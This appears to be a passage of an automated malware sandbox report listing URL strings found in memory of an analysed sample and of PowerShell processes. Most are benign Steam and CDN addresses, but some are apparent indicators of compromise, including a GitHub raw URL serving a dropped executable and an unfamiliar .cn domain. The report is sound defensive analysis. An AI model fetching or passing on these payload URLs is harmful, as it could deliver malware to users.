Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exe String found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://help.steampowered.com/en/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.c
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/
